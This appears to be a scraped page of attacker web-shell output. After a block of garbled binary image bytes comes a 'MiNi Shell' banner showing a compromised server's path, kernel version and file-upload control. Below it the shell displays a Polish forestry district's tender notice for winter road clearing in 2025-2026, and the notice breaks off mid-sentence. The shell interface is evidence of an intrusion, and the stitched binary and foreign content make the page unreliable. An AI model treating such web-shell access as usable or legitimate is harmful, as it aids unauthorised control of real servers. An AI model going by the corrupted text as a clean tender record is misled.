JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251114/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251114/0053390201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg leśnych na terenie Nadleśnictwa Stuposiany w sezonie zimowym 2025-2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO STUPOSIANY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370014538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stuposiany</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-713</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">stupopsiany@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/nadlesnictwo-stuposiany</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg leśnych na terenie Nadleśnictwa Stuposiany w sezonie zimowym 2025-2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f25f8a18-34fe-4f37-be9a-81069bd6598a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00533902</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00034678/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zimowe utrzymanie dróg leśnych na terenie Nadleśnictwa Stuposiany w sezonie zimowym 2025-2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_stuposiany <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_stuposiany</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w niniejszym<br/>postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. Komunikacja ustna jest nie dopuszczalna.<br/>3. Komunikacja między Zamawiającym, a Wykonawcami w niniejszym postępowaniu odbywa się przy użyciu platformy zakupowej<br/>Open Nexus - platformazakupowa.pl (dalej: „Platforma”): https://platformazakupowa.pl/pn/lasy_stuposiany.<br/>4. Wymagania techniczne i organizacyjne dotyczące w szczególności logowania, składania ofert, składania wniosków o wyjaśnienie<br/>treści SWZ, wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz innych<br/>informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z Platformy<br/>https://platformazakupowa.pl/strona/45-instrukcje, w zakładce „Instrukcje dla Wykonawców” oraz w Regulaminie korzystania z<br/>Platformy, dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin .<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod wskazanym wyżej linkiem, w zakładce „Regulamin”<br/>oraz uznaje go za wiążący, a ponadto powinien zapoznać się z Instrukcją składania ofert/wniosków dostępną pod wskazanym wyżej<br/>linkiem, i stosować do niej.<br/>INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE<br/>KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH<br/>SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ zawiera Rozdział 8 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W związku z rozpoczęciem obowiązywania z dniem 25 maja 2018 r. Rozporządzenia<br/>Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (dalej nazwa RODO), stosownie do wymogów wynikających<br/>z art. 13 ust. 1 i ust. 2 tego aktu prawnego informujemy, że administratorem Państwa danych osobowych jest Nadleśnictwo<br/>Stuposiany z siedzibą Stuposiany 1A. Przedstawicielem administratora jest: Nadleśniczy – Ewa Tkacz.<br/>2. Z administratorem można skontaktować się: osobiście w siedzibie Nadleśnictwa Stuposiany telefonicznie pod numerem 13 461 00<br/>10, za pomocą poczty elektronicznej e-mail pod adresem: ewa.tkacz@krosno.lasy.gov.pl . Administrator nie wyznaczył Inspektora<br/>Ochrony Danych Osobowych.<br/>3. Przetwarzanie Państwa danych osobowych jest dokonywane w celu prawidłowej realizacji obowiązków ustawowych tj.<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego i zawarcia umowy z wybranym wykonawcą. Dane osobowe są<br/>przetwarzane na podstawie prawnej art. 6 ust. 1 lit. b) i lit. c) RODO. Podanie danych jest dobrowolne, ale jest warunkiem wzięcia<br/>udziału w postępowaniu<br/>o udzielenie zamówienia publicznego oraz zawarcia umowy.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U.<br/>z 2024 r. poz. 1320), dalej „ustawa Pzp”.<br/>5. Państwa dane osobowe mogą być przekazywane do organów państwowych (np. Policja, prokuratura) prowadzących<br/>postępowania (np. karne, o wykroczenia). Dane mogą być również przekazywane kancelarii prawnej prowadzącej obsługę prawną<br/>Nadleśnictwa, jak również do jednostek nadrzędnych Lasów Państwowych<br/>w szczególności do RDLP w Krośnie oraz DGLP. Ponadto dane osobowe będą udostępniane łącznie z dokumentacją dotyczącą<br/>postępowania o udzielenie zamówienia publicznego w przypadkach składania wniosków o udostępnienie informacji publicznej.<br/>6. Państwa dane osobowe są przetwarzane ręcznie oraz elektronicznie za pomocą Systemu Informatycznego Lasów Państwowych.<br/>Dane osobowe są i będą przetwarzane przez okres czasu wyznaczony przepisami o rachunkowości – nie dłużej niż 6 lat licząc od<br/>wystawienia ostatniej faktury, jak również wyznaczony przepisami kodeksu cywilnego o przedawnieniu roszczeń – podstawowy termin 6 lat od wymagalności roszczenia, jak również przez okres czasu wyznaczony przepisami (w tym wewnętrznymi) o<br/>archiwizacji dokumentów – w zależności od tego, który<br/>z tych okresów będzie najdłuższy.<br/>INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH zawiera rozdział 23 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">270.1.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia.<br/>1. Nazwa przedmiotu zamówienia: „Zimowe utrzymanie dróg leśnych na terenie Nadleśnictwa Stuposiany w sezonie<br/>zimowym 2024 - 2025 r.”<br/>2. Zakres rzeczowy przedmiotu zamówienia:<br/>Zadanie nr 1 – odśnieżanie przy użyciu pługów lekkich i średnich, uszorstnianie nawierzchni przy użyciu piaskarek lub<br/>urządzeń rozsypujących – droga nr 2307R Stuposiany – Tarnawa.<br/>Długość drogi to 15,2 km <br/>Szacunkowa całkowita wielkość: 1000,00 km drogi do odśnieżenia w ciągu terminu realizacji zamówienia<br/>Zadanie nr 2 - odśnieżanie przy użyciu pługów lekkich i średnich, uszorstnianie nawierzchni przy użyciu piaskarek lub<br/>urządzeń rozsypujących – pozostałe drogi leśne – stokówki i Parking dla samochodów osobowych – Muczne nr inw.<br/>220/2467.<br/>Łączna długość to 64,9 km pozostałych dróg leśnych.<br/>Szacunkowa całkowita wielkość: 1000,00 km dróg do odśnieżenia w ciągu terminu realizacji zamówienia<br/>1) Wykonawca zrealizuje przedmiot zmówienia przy użyciu sprzętu i materiałów własnych. Zamawiający nie będzie<br/>udostępniał ani przekazywał Wykonawcy swojego sprzętu w celu realizacji przedmiotu zamówienia;<br/>2) Warunki realizacji:<br/>a) odśnieżanie dróg leśnych;<br/>b) dla Zadania 2 dodatkowo: odśnieżanie istniejących mijanek, zjazdów oraz przyległych do drogi użytkowanych składów<br/>drewna;<br/>c) zapobieganie powstawania oraz usuwanie śliskości na drogach leśnych poprzez posypywanie mieszanką materiałów<br/>zwiększających szorstkość nawierzchni.<br/>d) drogi odśnieżać należy pasem utwardzonym + pobocza;<br/>e) Czas reakcji Wykonawcy na każdorazowe rozpoczęcie świadczenia usługi nie może być dłuższy niż 1 godz. tzn. od<br/>momentu zawiadomienia telefonicznego o potrzebie usługi, do jej rozpoczęcia.<br/>f) odśnieżanie należy wykonać przy pomocy zestawu pojazd mechaniczny<br/>z pługiem śniegowym (lub wirnikowym) z możliwością uszorstniania nawierzchni przy użyciu urządzeń rozsypujących;<br/>g) w przypadku braku opadów śniegu i gołoledzi akcji zimowego utrzymania dróg nie prowadzi się. Wykonawcy przez okres<br/>wstrzymania akcji nie przysługuje wynagrodzenie;<br/>h) Zamawiający nie przewiduje płatności z tytułu utrzymania sprzętu<br/>i operatorów w gotowości.<br/>i) Prace objęte zamówieniem zostaną wykonane zgodnie z obowiązującymi przepisami i normami.<br/>j) Standard odśnieżonej drogi to:<br/>• dla Zadania nr 1: od 1 do 2 cm pokrywy śnieżnej na drodze<br/>(nie należy odśnieżać do samej nawierzchni asfaltu), szer. 5,5 m. Odśnieżoną drogę należy posypywać na zakrętach i<br/>podjazdach.<br/>• dla Zadania nr 2: Standard odśnieżonej drogi to od 1 do 2 cm pokrywy śnieżnej na drodze (nie odśnieżać do samej<br/>nawierzchni drogi), szer. 4 m. Odśnieżoną drogę należy posypać na zakrętach<br/>i podjazdach. 3) określone ilości przedmiotu zamówienia są wielkościami szacunkowymi i nie zobowiązują Zamawiającego do realizacji<br/>zamówienia w pełnych wykazanych ilościach. Zamawiający zastrzega możliwość redukcji przedmiotu zamówienia.<br/>Wykonanie usługi w mniejszych ilościach nie może być podstawą żadnych roszczeń ze strony Wykonawcy w stosunku do<br/>Zamawiającego. W przypadku braku opadów śniegu i braku występowania śliskości na drogach akcji zimowego utrzymania<br/>dróg nie prowadzi się. Wykonawcy przez okres wstrzymania akcji nie przysługuje wynagrodzenie. Zamawiający nie<br/>przewiduje płatności z tytułu utrzymania sprzętu i operatorów w gotowości.<br/>4) Zamawiający nie dopuszcza składania ofert częściowych na poszczególne zadania.<br/>5) Wykonawca zobowiązany jest w czasie wykonywania usługi zapewnić na terenie objętym umową należyty ład, porządek,<br/>przestrzeganie przepisów BHP i ppoż. oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją prac oraz<br/>wskutek innych działań osób zatrudnionych przez wykonawcę. Za bezpieczeństwo publiczne ludzi i mienia związane z<br/>prowadzonymi usługami odpowiada Wykonawca;<br/>6) Zamawiający może zlecić w trakcie realizacji Umowy zakres prac mniejszy niż wskazany w SWZ;<br/>7) Szczegółowy rozmiar, lokalizacja, termin wykonania prac wynikające z przyjętej oferty na ich wykonanie, zostaną<br/>określone na bieżąco w zależności od panujących warunków atmosferycznych. Osobami wydającymi dyspozycje są:<br/>Zastępca Nadleśniczego, Sekretarz Nadleśnictwa i St. Specjalista ds. marketingu. Zlecenia będą przekazywane<br/>telefonicznie. Dane osobowe i nr telefonów zostaną wskazane w dniu zawarcia umowy.<br/>8) Rozliczanie za wykonane usługi będzie odbywało się w okresach miesięcznych. Wyliczenie ich wartości będzie wyglądało<br/>następująco:<br/>• na koniec każdego miesiąca wykonawca wystawi fakturę za usługi.<br/>• płatności wynikające z przedstawionych faktur zostaną uregulowane przelewem na rachunek bankowy Wykonawcy<br/>wskazany w fakturze,<br/>w terminie do 14 dni od daty dostarczenia Zamawiającemu faktury,<br/>• rozliczenie między stronami odbywać się będzie wyłącznie w walucie polskiej.<br/>• podstawę do wystawienia faktury będzie protokół odbioru usług, podpisany bez uwag przez Sekretarza Nadleśnictwa<br/>Stuposiany lub właściwych terytorialnie Leśniczych.<br/>• Wykonanie usługi z wadami nie uznaje się, za jej wykonanie. W przypadku stwierdzenia w trakcie miesięcznego okresu<br/>rozliczeniowego wad/usterek w wykonaniu usługi objętej przedmiotem umowy, Wykonawca będzie mógł wystawić fakturę<br/>dopiero po usunięciu stwierdzonych wad.<br/>9) Zamawiający zastrzega sobie prawo kontroli usług wykonywanych przez Wykonawcę.<br/>10) wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę, a w szczególności: dojazd na<br/>miejsce wykonania zadania, koszty zakupu paliwa, koszty eksploatacji maszyn, wynagrodzenie pracowników, ilość<br/>przejazdów po drogach (tam i z powrotem), prace porządkowe po zakończeniu usługi oraz ewentualne upusty i rabaty zastosowane przez wykonawcę inne opłaty niewymienione, a które mogą wystąpić przy realizacji przedmiotu zamówienia.<br/>3. Miejscem realizacji przedmiotu zamówienia będzie obszar administracyjny Nadleśnictwa Stuposiany.<br/>4. Rodzaj zamówienia - usługi. Oznaczenie według Wspólnego Słownika Zamówień CPV:<br/>90620000-9 – Usługi odśnieżania<br/>90630000-2 – Usługi usuwania oblodzenia<br/>5. Wykonawca zrealizuje przedmiot zmówienia przy użyciu materiałów własnych.<br/>Wymogi dotyczące zatrudnienia na podstawie umowy o pracę.<br/>6. Zgodnie z art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie<br/>umowy o pracę osób wykonujących czynności związane z realizacją przedmiotu zamówienia, jeżeli wykonanie tych<br/>czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia<br/>26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz. 1465.).<br/>Zamawiający nie wymaga, by na podstawie umowy o pracę zatrudniony był osobiście Wykonawca lub podwykonawca<br/>(podwykonawcy), będący osobą fizyczną, prowadzącą działalność gospodarczą, także w formie spółki cywilnej. Wymóg<br/>zatrudnienia osób na podstawie umowy o pracę, w dalszej części niniejszej SWZ oraz w pozostałych dokumentach<br/>dotyczących przedmiotowego zamówienia publicznego jest określany także jako: „obowiązek zatrudnienia”.<br/>7. Zamawiający informuje, że każdorazowo na jego żądanie, w terminie wskazanym przez Zamawiającego, Wykonawca<br/>zobowiązany będzie do przedłożenia do wglądu kopii umów o pracę zawartych przez Wykonawcę lub podwykonawcę z<br/>osobami realizującymi przedmiot zamówienia, których dotyczy ust. 6, zanonimizowanych w sposób zapewniający ochronę<br/>danych osobowych pracowników, zgodnie z przepisami o ochronie danych osobowych (w szczególności bez<br/>wynagrodzenia, numerów PESEL, numerów dokumentów tożsamości oraz adresów ich zamieszkania). Imię i nazwisko<br/>pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu<br/>powinny być możliwe do zidentyfikowania.<br/>Nieprzedłożenie przez Wykonawcę kopii umów zawartych przez Wykonawcę lub podwykonawcę z osobami, o których<br/>mowa w ust. 6, w terminie wskazanym przez Zamawiającego będzie traktowane jako niewypełnienie obowiązku<br/>zatrudnienia tych osób na podstawie umowy o pracę.<br/>8. Szczegółowe zasady kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 95 ustawy Pzp i w ust. 7<br/>powyżej niniejszej SWZ oraz sankcje z tytułu niespełnienia tych wymagań, zawierają postanowienia umowy (projekt umowy<br/>stanowi załącznik nr 8 do SWZ).<br/>OPIS PRZEDMIOTU ZAMÓWIENIA ORAZ WYMAGANIA DOTYCZĄCE REALIZACJI ZAMÓWIENIA zawiera rozdział 3<br/>SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 Pzp, w przypadku udzielenia, w<br/>okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, zamówienia polegającego na<br/>powtórzeniu podobnych usług stanowiących przedmiot zamówienia. Zakres rzeczowy usług stanowiących przedmiot zamówień, o<br/>których mowa powyżej, nie przekroczy wartości 50 % wartości niniejszego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający kierować się będzie następującymi<br/>kryteriami:<br/>– Cena – 60%<br/>–Samodzielna realizacja kluczowej części zamówienia– 40%<br/>2. W ramach każdego z powyższych kryteriów można otrzymać maksymalnie 100 pkt, co po przeliczeniu przez odpowiednią wagę<br/>procentową oznacza, że w kryterium „Cena” można otrzymać maksymalnie 60 pkt, natomiast w kryterium „Samodzielna realizacja<br/>zamówienia” można otrzymać maksymalnie 40 pkt.<br/>3. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się odbywać według zasad opisanych w<br/>ust. 4 poniżej.<br/>4. Oferty będą oceniane wg następującego wzoru:<br/>1) W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty. Ocena ofert w tym kryterium<br/>zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Cmin<br/>C = ------------------ x 100 pkt x 60%<br/>Co<br/>gdzie:C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>2) W ramach kryterium „Samodzielna realizacja kluczowej części zamówienia” oceniane będzie przyjęcie przez Wykonawcę<br/>zobowiązania umownego do wykonywania przedmiotu zamówienia, określonego przez Zamawiającego w SWZ, samodzielnie przez<br/>Wykonawcę składającego ofertę, tj. bez udziału podwykonawców. Kluczowa część zamówienia oznacza zadania polegające<br/>bezpośrednio na odśnieżaniu oraz zimowym utrzymaniu dróg leśnych za pomocą sprzętu, tj. zadania opisane w Rozdziale 3 ust. 2<br/>pkt 1 niniejszej SWZ. Zasady realizacji tego zobowiązania oraz zasady odpowiedzialności za jego niewykonanie zostały opisane w<br/>projekcie umowy. W projekcie umowy zobowiązanie do wykonywania kluczowych elementów zamówienia, określonych przez<br/>Zamawiającego w SWZ, samodzielnie przez wykonawcę składającego Ofertę, tj. bez udziału podwykonawców jest określane jako<br/>„Obowiązek Samodzielnej Realizacji”. Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do<br/>samodzielnej realizacji przedmiotu zamówienia w Ofercie (załącznik nr 1 do SWZ). Brak wskazania w Ofercie przyjęcia przez<br/>Wykonawcę zobowiązania, o którym mowa w zdaniu poprzednim będzie uznawane jako nieprzyjęcie takiego zobowiązania, a Oferta<br/>wykonawcy uzyska 0 pkt. w ramach niniejszego kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie<br/>otrzyma 40 